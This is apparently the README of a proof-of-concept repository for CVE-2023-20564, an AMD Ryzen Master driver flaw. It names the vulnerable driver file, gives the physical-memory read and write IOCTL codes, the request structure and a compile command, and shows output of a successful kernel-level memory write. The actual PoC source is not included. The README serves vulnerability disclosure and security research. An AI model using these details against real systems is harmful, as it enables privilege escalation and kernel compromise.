# CVE-2023-20564 - AMD Ryzen Master Driver Physical Memory Access PoC

[![CVSS](https://img.shields.io/badge/CVSS-8.8-red)](https://nvd.nist.gov/vuln/detail/CVE-2023-20564)
[![Platform](https://img.shields.io/badge/Platform-Windows-blue)]()

## Overview

This repository contains a **Proof of Concept (PoC)** demonstrating the vulnerability **CVE-2023-20564** in AMD Ryzen Master Driver. The vulnerability allows unprivileged users to read and write arbitrary physical memory, leading to potential privilege escalation and system compromise.

## Vulnerability Details

- **CVE ID**: CVE-2023-20564
- **CVSS Score**: 8.8 (High)
- **Vendor**: AMD
- **Product**: AMD Ryzen Master Driver
- **Affected Versions**: Multiple versions of AMD Ryzen Master software
- **Impact**: Physical memory read/write access leading to privilege escalation

### Technical Description

The AMD Ryzen Master driver (`AMDRyzenMasterDriverV17.sys`) contains insufficient validation in its IOCTL handlers, specifically:

- **Read IOCTL**: `0x81112F08` - Allows reading arbitrary physical memory
- **Write IOCTL**: `0x81112F0C` - Allows writing arbitrary physical memory

The driver fails to properly validate:
1. Physical memory addresses
2. Size boundaries
3. Protected memory regions

This allows malicious applications to:
- Read sensitive kernel data structures
- Modify critical system components
- Bypass Windows kernel protections
- Achieve arbitrary code execution in kernel mode


### Files Needed
- `AMDRyzenMasterDriverV17.sys` - The vulnerable driver file
- Source code from this repository

### 2. Compile the PoC
```batch
# manually
g++ -std=c++17 poc_demo.cpp -o poc_demo.exe -ladvapi32
```

### Key Components

#### Memory Structures
```cpp
typedef struct _AMDReadStructure {
    LARGE_INTEGER PhysAddr;     // Physical address to read
    LARGE_INTEGER SizeAndData;  // Size and data buffer
    CHAR Buffer[1];             // Variable data buffer
} AMDReadStructure, *PAMDReadStructure;
```

#### Core Functions
- `ReadPhysicalMemory()` - Read from physical memory
- `WritePhysicalMemory()` - Write to physical memory
- `TestReadWriteVerify()` - Complete test sequence
- `InstallDriverService()` - Driver installation
- `StopAndRemoveDriverService()` - Driver cleanup

## Example Output

```
===========================================
  AMD Ryzen Master Driver - Memory PoC    
===========================================

[*] Installing and starting driver service...
[+] Driver file found
[+] Service created successfully
[+] Service started successfully

[*] Initializing driver connection...
[+] Driver connection established successfully

[!] TESTING READ/WRITE/VERIFY SEQUENCE

[STEP 1] Reading original data...
[*] Reading 8 bytes from physical address 0x100000
[*] PHYSICAL MEMORY READ SUCCESS!
    Read 8 bytes from 0x100000
    Data: 4D 5A 90 00 03 00 00 00

[STEP 2] Writing test data...
[*] Writing 8 bytes to physical address 0x100000
    Data: DE AD BE EF CA FE BA BE
[*] PHYSICAL MEMORY WRITE SUCCESS!
    Wrote 8 bytes to 0x100000

[STEP 3] Verifying written data...
[*] Reading 8 bytes from physical address 0x100000
[*] PHYSICAL MEMORY READ SUCCESS!
    Data: DE AD BE EF CA FE BA BE

[*] DATA VERIFICATION SUCCESS! Write/Read works correctly!
```

## Technical Analysis

### IOCTL Handler Analysis

The vulnerable driver exposes two main IOCTLs:

1. **Physical Memory Read (`0x81112F08`)**
   - Input: Physical address + size
   - Output: Memory content at specified address
   - No validation of address ranges

2. **Physical Memory Write (`0x81112F0C`)**
   - Input: Physical address + size + data
   - Output: None
   - No validation of protected memory regions
   
## References

- [CVE-2023-20564 - MITRE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20564)
- [NVD Entry](https://nvd.nist.gov/vuln/detail/CVE-2023-20564)
- [AMD Security Advisory](https://www.amd.com/en/corporate/product-security)
- [Windows Driver Security Best Practices](https://docs.microsoft.com/en-us/windows-hardware/drivers/driversecurity/)

---

**Remember**: This tool is for authorized security testing only. Always obtain proper permission before testing on any system.
